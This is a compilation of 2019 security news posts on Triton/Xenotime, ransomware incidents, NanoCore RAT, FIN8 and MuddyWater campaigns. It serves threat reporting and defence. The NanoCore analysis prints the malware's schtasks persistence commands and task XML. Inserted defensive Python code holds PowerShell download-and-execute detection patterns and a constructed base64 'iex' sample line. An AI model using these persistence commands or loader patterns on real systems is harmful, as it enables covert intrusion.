Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware (aka Trisis) was discovered by researchers at FireEye; it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), which is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014; its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Triton Xenotime

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to the ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed to breach the targeted organizations.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that use ICS/SCADA systems similar to the ones in the oil and gas industries.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continue the experts.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta, below the video of the presentation:

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Cyber News Rundown: Radiohead Hit by Ransomware Hack


Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

The account information of over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming-related, was leaked. The breach, which took place in April of 2018, affected 1.1 million IP and email addresses, many of which were found in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user data it’s clear EmuParadise could have done more to properly secure their users’ information.

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the pyLocky Ransomware versions 1 and 2, French authorities have released the pyLocky decryptor to decrypt the files for free.

French authorities have released a decryptor for pyLocky Ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology and Systems Service, and independent and volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is the result of a collaboration among the agencies of the French Ministry of Interior, including the first Brigade of fraud investigations in information technology (BEFTI) of the Regional Directorate of the Judicial Police of Paris, based on the technical elements gathered during its investigations and collaboration with volunteer researchers.” reads the post published by the French Ministry of Interior.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST(SI)², part of the National Gendarmerie, to create that software.”

French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses, associations.

The pyLocky decryptor allows victims to decrypt files for version 1 (filenames with the .lockedfile or .lockymap extensions) and version 2 (the .locky extension).

pyLocky Decryptor

The pyLocky Decryptor could be downloaded from the following link:

The decryptor requires the Java Runtime to be installed.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of 2 hardcoded private RSA keys that were likely obtained by French police from the access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)

The post French authorities released the PyLocky decryptor for versions 1 and 2 appeared first on Security Affairs.

Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of the NanoCore Remote Administration Tool (RAT) that uses a Delphi wrapper to protect its code.


Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the well-known NanoCore Remote Administration Tool (RAT). In this specific case, a Delphi wrapper was used to protect the RAT, so Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

NanoCore RAT is a “general purpose” malware with client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the luxury sector. For instance, we intercepted a malicious email claiming to come from a well-known Italian bank, and we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with an Adobe Acrobat icon, a trivial trick used to lure unsuspecting users into believing it is a legitimate PDF file. However, it contains a PE executable:

Threat: Nanocore RAT wrapper
Brief Description: Delphi Language Wrapper for Nanocore RAT

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with the “BobSoft Mini Delphi” compiler, and two characteristics are significant: the first is the high level of entropy, which leads us to think that the sample was packed in some way; the second is the obviously fake compilation timestamp of the executable.

When executing the malware, we noticed some checks it performs in order to evade analysis sandboxes.

Figure 3: Processes checked by malware

The above figure shows some of the processes checked by the malware. This check is performed through the classic Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If none of the checked processes is active, the malware proceeds with the real infection: it writes the actual NanoCore RAT payload into the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

Interestingly, the payload, which is later loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has a lot of embedded resources (visible on the left), and one of them contains the entire NanoCore RAT payload. On the right there is a diff analysis of the resource named “2035” and the actual payload dropped on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, in the upper-left corner) which contains the name of the payload to implant on the machine, “non.exe”. The rest of the data is identical, without any protection. The “trasferimento.exe” component creates a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates an XML file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawns itself through the following command lines:

"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp"
"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp"

The body of the XML configuration file is the following:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>

The difference between the two scheduled tasks is the fact that one references “trasferimento.exe” process and the other one references “non.exe” process. It seems to be a sort of a survival mechanism in which both the processes work and keep the infection alive.
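Task definitions like the one above can be audited for the persistence traits it shows. The following is an added example, not code from the Cybaze-Yoroi ZLab analysis: it parses Task Scheduler XML and flags an Exec command in a user-writable location, RunLevel HighestAvailable, a hidden task and an unlimited ExecutionTimeLimit. SAMPLE_TASK is constructed from the values quoted in the article, with the Task Scheduler schema namespace filled in; BENIGN_TASK is a constructed counterpart.

```python
"""Flag persistence traits in a Windows Task Scheduler XML definition.

Added example; it is not code from the Cybaze-Yoroi ZLab analysis. It parses the
kind of task XML that the wrapper registers with "schtasks /create /xml" and
reports the traits visible in the definition above: an Exec command living in a
user-writable location, RunLevel HighestAvailable, a hidden task, and an
unlimited ExecutionTimeLimit. SAMPLE_TASK is constructed from the values quoted
in the article; the Task Scheduler schema namespace is filled in here because
the quoted copy had it stripped.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Paths a legitimate scheduled task rarely executes from (heuristic for this example).
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Desktop|Downloads|Documents|AppData\\(Local|Roaming))\\|\\Temp\\",
    re.IGNORECASE,
)
XML_DECLARATION = re.compile(r"^\s*<\?xml[^>]*\?>")


def _local_name(tag: str) -> str:
    """Strip an XML namespace ('{ns}RunLevel' -> 'RunLevel')."""
    return tag.rsplit("}", 1)[-1]


def audit_task_xml(xml_text: str) -> list[str]:
    """Return findings for one task definition; an empty list means nothing stood out."""
    # Task XML on disk is UTF-16 with a matching declaration. When the text has
    # already been decoded to str, drop the declaration so expat does not object.
    root = ET.fromstring(XML_DECLARATION.sub("", xml_text, count=1))
    findings: list[str] = []
    for elem in root.iter():
        name = _local_name(elem.tag)
        text = (elem.text or "").strip().strip('"')
        if name == "Command" and USER_WRITABLE.search(text):
            findings.append(f"Exec command in user-writable path: {text}")
        elif name == "RunLevel" and text == "HighestAvailable":
            findings.append("RunLevel HighestAvailable: task asks for elevated rights")
        elif name == "Hidden" and text.lower() == "true":
            findings.append("Hidden task: not shown in the Task Scheduler UI")
        elif name == "ExecutionTimeLimit" and text == "PT0S":
            findings.append("ExecutionTimeLimit PT0S: task is allowed to run indefinitely")
    return findings


# Constructed from the definition quoted in the article (settings abbreviated).
SAMPLE_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Hidden>false</Hidden>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign counterpart: vendor binary under Program Files, least
# privilege, bounded run time.
BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Hidden>false</Hidden>
    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\ExampleVendor\updater.exe"</Command>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        print(label, audit_task_xml(xml_text) or ["no findings"])
```

On a live system the same function can be run over the task files under C:\Windows\System32\Tasks, which are stored in the format parsed here.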

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis, one of them (185.244.31[.]50) was down and the other one (79.134.225[.]41) continued to work.

Figure 9: Communication with two different C2

NanoCore Client

Threat: Nanocore RAT
Brief Description: NanoCore RAT client

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start analyzing the “non.exe” file, which is the NanoCore RAT client; this one, too, is compiled in .NET.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after a few steps of debugging; we also extracted the current version, as highlighted in the red square. Going ahead with debugging, we found a recurring routine used to decrypt the RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, this one leverages an encrypted configuration that is only decrypted during execution. Interestingly, the extracted configuration does not include persistence, which is instead guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting features enabled, like the capability to bypass UAC or to prevent the system from going to sleep. Moreover, the primary and backup C2 are the same, and the backup C2 role is effectively provided by the other “trasferimento.exe” RAT-mode process.


Nowadays a lot of cyber criminals don’t strive to write malware from scratch because there is already a vast number of public tools suitable for this need. From the attacker’s point of view, the problem with using these tools is that sooner or later they will be recognized by anti-virus engines.

Therefore, attackers adopt other technologies like packers and obfuscators, many times publicly available too, or write custom loaders to hide their espionage tools, keeping them running on victim machines for a long time, silently observing their targets and awaiting the right time to act on their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)

The post Dissecting NanoCore Crimeware Attack Chain appeared first on Security Affairs.

Ransomware paralyzed production for at least a week at ASCO factories

Malware infections can be devastating for production environments: a ransomware infection halted production operations for days at airplane parts manufacturer ASCO.

ASCO is one of the world’s largest manufacturers of aerospace components.

The company has offices and production plants in Belgium, Canada, Germany, the US, Brazil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed the production in ASCO plants across several countries worldwide. The attack reportedly started on Friday and at the time of writing the current extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1,400 were sent home for the entire week, on paid leave.


As a result of having IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.”

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately afterwards ASCO also shut down production plants in Germany, Canada, and the US as a precaution.

At this time it is not clear whether the company decided to pay the ransom to restore its systems rapidly or simply restored its backups.

Although ASCO would be a privileged target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a targe”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)

The post Ransomware paralyzed production for at least a week at ASCO factories appeared first on Security Affairs.

Smart home security devices most at risk in IoT-targeted cyber attacks

Smart home security cameras account for 47% of the most vulnerable devices, followed by smart hubs such as Google Home and Amazon Alexa, with the top countries executing attacks being China followed by the USA, according to SAM Seamless Networks. Other findings reveal the USA and China are the foremost countries for both executing attacks and being targeted. The average home receives five attempted attacks per device per day via smart networks. Email malware and phishing are …

The post Smart home security devices most at risk in IoT-targeted cyber attacks appeared first on Help Net Security.

FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years after the last report, the FIN8 group is back and has carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers at root9B in June 2017; the malware was used by threat actors to deliver PoS malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in the attempt of delivering PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separated.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

ShellTea attempts to evade detection by checking for the presence of virtualized environments and standard analysis tools. The malicious code uses a hashing algorithm for most of its functions; the algorithm is similar to the one implemented in the previous ShellTea version.

ShellTea is then injected into Explorer; it communicates with the C2 over HTTPS and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using the downloaded native Empire ReflectivePicker, and of course downloading and executing POS malware.

Attackers use a PowerShell script to collect information on the user and the network, then send the gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8, we’ve seen multiple attacks by FIN6, FIN7 and others.” concludes Morphisec.

“Many POS networks are running on the POS version of Windows 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability. As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses.”

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)

The post FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor appeared first on Security Affairs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

Together with HomeAway, we here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Oftentimes, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros), has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

The experts named the campaign ‘MuddyWater’ because of the confusion in attributing a wave of attacks, carried out between February and October 2017, against entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

The threat actors continue to evolve their TTPs: a few weeks ago Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted its use of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage POWERSTATS backdoor; the experts observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used compromised legitimate accounts to send spear-phishing messages carrying a document embedded with a malicious macro.

MuddyWater email

The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data will be decoded and saved to the %PUBLIC% directory with various names and image file extensions such as .jpeg and .png. The attackers’ PowerShell code implements a custom string obfuscation and junk stubs of code to make it difficult to analyze.

Once all the strings are deobfuscated, the final backdoor code is revealed. The backdoor first gathers operating system (OS) information and saves the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exe process.”

The hackers can launch a second-stage attack by sending specific commands to the backdoor. The malicious code can also install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands, such as taking screenshots and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.
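The staging step described above (a decoded script saved under %PUBLIC% with a .jpeg or .png name) can be checked for directly on an endpoint. What follows is an added example, not Trend Micro’s or MuddyWater’s code: it compares a file’s leading bytes with the magic numbers of the image format its extension claims and flags mismatches, with a loose search for PowerShell markers as a secondary hint only (the real script is obfuscated, so the header mismatch is the reliable signal). The directory it scans and the sample files it creates are constructed for the example.

```python
"""Flag files that carry an image extension but are not images.

Added example, not Trend Micro's or MuddyWater's code. It mirrors the
staging behaviour described above (payload stashed under %PUBLIC% with a
.jpeg/.png name) and checks the file header against the real image magic
bytes. Sample files are constructed in a temporary directory.
"""
import os
import re
import tempfile
from pathlib import Path

# Magic bytes for the extensions MuddyWater reused for its stash.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".bmp": (b"BM",),
}

# Loose markers of PowerShell source text; the real script is obfuscated,
# so treat a hit as a hint, not a signature. The header mismatch is the signal.
PS_HINT = re.compile(rb"(?i)(invoke-expression|\biex\b|frombase64string|"
                     rb"new-object|\$env:|downloadstring)")


def classify(path):
    """Return (verdict, detail) for one file: 'ok', 'suspect' or 'skip'."""
    p = Path(path)
    magics = IMAGE_MAGIC.get(p.suffix.lower())
    if magics is None:
        return "skip", "not an image extension"
    with open(p, "rb") as fh:
        head = fh.read(4096)
    if any(head.startswith(m) for m in magics):
        return "ok", "header matches extension"
    detail = "header mismatch"
    hint = PS_HINT.search(head)
    if hint:
        detail += ", PowerShell marker %r" % hint.group(0).decode("ascii", "replace")
    return "suspect", detail


def scan_directory(directory):
    """Walk a directory (e.g. %PUBLIC%) and return (relative path, detail) for suspects."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            verdict, detail = classify(full)
            if verdict == "suspect":
                hits.append((os.path.relpath(full, directory), detail))
    return sorted(hits)


def build_sample_tree():
    """Construct a throwaway directory with one real PNG, two fakes and a text file."""
    d = tempfile.mkdtemp(prefix="public_")
    Path(d, "wallpaper.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    # A text payload wearing an image name, like the staged script above (constructed).
    Path(d, "photo.jpeg").write_bytes(
        b"$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('QQ=='));iex $p")
    Path(d, "avatar.png").write_bytes(b"not really a picture\r\n")
    Path(d, "readme.txt").write_bytes(b"plain text, ignored")
    return d


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel, why in scan_directory(sample):
        print(rel, "->", why)
    # On a live host: scan_directory(os.environ.get("PUBLIC", r"C:\Users\Public"))
```

Run it against a real %PUBLIC% (or any user-writable staging directory) and review every “suspect” hit by hand; a legitimate image with a stripped or exotic header is possible, but a file whose body starts with script text is not.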

On the server side, the C2 is implemented as PHP scripts that have a hardcoded token and a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Trend Micro observed an evolution of the malicious code used by the MuddyWater group: in March and April the hackers were using the heavily obfuscated POWERSTATS v2, while in May they deployed the new POWERSTATS v3.

The following table reports some of the campaigns observed by Trend Micro in H1 2019, with the dropping method, the type of file dropped and the final payload:


Discovery date   Method for dropping malicious code   Type of files dropped    Final payload
2019-03          Macros                               Base64 encoded, BAT      POWERSTATS v2
2019-04          Template injection                   Document with macros     POWERSTATS v1 or v2
2019-05          Macros                               VBE                      POWERSTATS v3

It is interesting to note that the MuddyWater attackers do not use zero-day exploits in their campaigns; instead, the threat actors keep evolving their TTPs to avoid detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic, recently addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

